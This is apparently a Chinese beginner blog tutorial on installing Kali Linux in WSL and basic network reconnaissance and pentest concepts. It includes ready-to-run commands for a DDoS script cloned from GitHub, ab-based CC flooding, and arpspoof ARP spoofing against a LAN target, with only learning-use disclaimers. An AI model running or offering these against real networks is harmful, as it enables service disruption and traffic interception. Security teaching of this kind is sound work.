前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Linux】Kali(WSL)基本操作与网络安全入门

【Linux】Kali(WSL)基本操作与网络安全入门

作者头像
DevFrank
发布2024-07-24 15:53:37
580
发布2024-07-24 15:53:37
举报
文章被收录于专栏:C++开发学习交流

😏1. Kali-Linux介绍

官网:https://www.kali.org/

Kali Linux是一款基于Debian的Linux发行版,旨在为渗透测试和网络安全领域提供全面的工具集合。它是由Offensive Security团队开发和维护的,专门用于渗透测试、漏洞评估和数字取证等任务。

Kali Linux内置了大量的安全工具和软件包,涵盖了各种渗透测试和网络攻防领域的需求。其中包括信息收集工具、漏洞扫描器、密码破解工具、无线网络工具、社会工程学工具、数字取证工具等等。这些工具的使用使得Kali成为了安全专业人员、网络管理员和渗透测试人员的首选操作系统

除了强大的工具集合外,Kali还提供了一个友好的用户界面和易于使用的命令行界面,以满足不同用户的需求。它被广泛应用于安全评估、网络渗透测试、漏洞研究、恶意代码分析等领域。

值得注意的是,Kali Linux是一款专业的工具,仅用于合法的安全测试和授权的活动。非法使用这些工具可能会触犯法律或侵犯他人的隐私权,因此在使用Kali之前,请确保遵守适用的法律法规。

渗透测试流程:收集信息、漏洞扫描、渗透测试(查找漏洞)。

敲重点:只是学习使用!学习使用!学习使用!

😊2. 环境安装与配置

可以选择安装纯Kali Linux系统,或者用VMware等安装虚拟机系统,或者跟着本文来安装WSL系统。

WSL的基本操作可参考上一篇:http://t.csdnimg.cn/monkk

下面在WSL上安装Kali Linux

代码语言:javascript
复制
# 打开windows terminal终端,先用wsl -l查看已安装的发行版
wsl --install -d kali-linux

安装成功后如下:

在这里插入图片描述
在这里插入图片描述

更换国内源:

代码语言:javascript
复制
# 打开源文件
sudo nano /etc/apt/sources.list
# 注释原来的源,替换成下面的
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# 更新
sudo apt update

😆3. 基本操作

查看网络设备
代码语言:javascript
复制
# 了解OSI网络模型挺重要
# ping获取目标主机是否alive
ping baidu.com
# traceroute追踪数据包的路径并检测网络中的节点
traceroute baidu.com
# arp地址解析协议是将32位的IP地址转为48位的物理地址(MAC)
sudo arping 192.168.1.x -c 1
# netdiscover是一款用于网络发现和主机扫描的开源工具,用于在本地网络中快速查找并显示活动主机的IP地址和MAC地址
sudo netdiscover -i eth0 -r 192.168.1.1 (主动)
sudo netdiscover -p (被动)
查看网站信息
代码语言:javascript
复制
# 网络空间测绘
# 端口扫描
nmap 192.168.0.1
# 子域名
z.zcjun.com
# 查看域名
whois baidu.com
# 查看网站内容/CMS指纹识别
whatweb baidu.com
DDos攻击
代码语言:javascript
复制
# 下载py代码
git clone https://github.com/Andysun06/ddos
cd ddos
# 根据python版本选择
python2 ddos-p2.py
python3 ddos-p3.py
# 可以用自己博客的地址和端口进行测试,实际类似于不断向某一地址发送非法请求
CC攻击

可以在Kali Linux上使用ab命令进行基准测试和性能测量,以评估Web服务器的性能和负载能力。

代码语言:javascript
复制
# 安装
sudo apt install apache2-utils
# ab -n 参数1(并发数) -c 参数2(发送总量) 网站地址
ab -n 1000 -c 10 网站地址
ARP欺骗

ARP欺骗(ARP spoofing)是一种网络攻击技术,用于在局域网中篡改或伪造网络设备之间的ARP(地址解析协议)表项,从而实现网络流量的劫持、欺骗或监听。

代码语言:javascript
复制
# 安装
sudo apt install dsniff fping
# 嗅探所在WLAN下所有设备的IP地址
fping -g 本机IP地址/24
# arpspoof -i 网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址,如
arpspoof -i eth0 -t 192.168.0.118 192.168.0.1

😆4. 渗透测试学习

渗透测试是评估系统、应用程序或网络的安全性的过程。一般的渗透测试流程:

1.信息收集:收集目标系统或网络的相关信息,包括IP地址、域名、子域名、网络拓扑等。

2.目标识别:确定要针对的具体目标,例如特定的服务器、应用程序或数据库。

3.漏洞扫描:使用自动化工具(如Nmap、OpenVAS、Nessus等)执行端口扫描和漏洞扫描,以发现可能存在的安全漏洞。

4.漏洞利用:利用已发现的漏洞,尝试入侵系统或获取未授权访问。这可能涉及到使用已知的攻击向量、开发自定义脚本或利用零日漏洞。

5.权限提升:在成功入侵系统后,寻找提升权限的方法,以获取更高级别的访问权,例如管理员权限。

6.持久性维持:确保入侵者可以保持长期访问目标系统,通常通过植入后门、创建隐藏用户账户或配置远程访问工具等方式实现。

7.数据收集:获取目标系统上的敏感信息,例如用户凭据、数据库中的数据或关键文件。

8.覆盖踪迹:删除、修改或隐藏入侵行为的痕迹,以避免被发现。

9.安全报告:整理渗透测试的结果和发现的漏洞,并编写详细的报告,包括建议的修复措施和加强安全性的建议。

常用的漏洞公布网站:

代码语言:javascript
复制
https://www.cnvd.org.cn/
https://cve.mitre.org/
https://packetstormsecurity.com/
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-11-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 😏1. Kali-Linux介绍
  • 😊2. 环境安装与配置
  • 😆3. 基本操作
    • 查看网络设备
      • 查看网站信息
        • DDos攻击
          • CC攻击
            • ARP欺骗
            • 😆4. 渗透测试学习
            相关产品与服务
            网站渗透测试
            网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档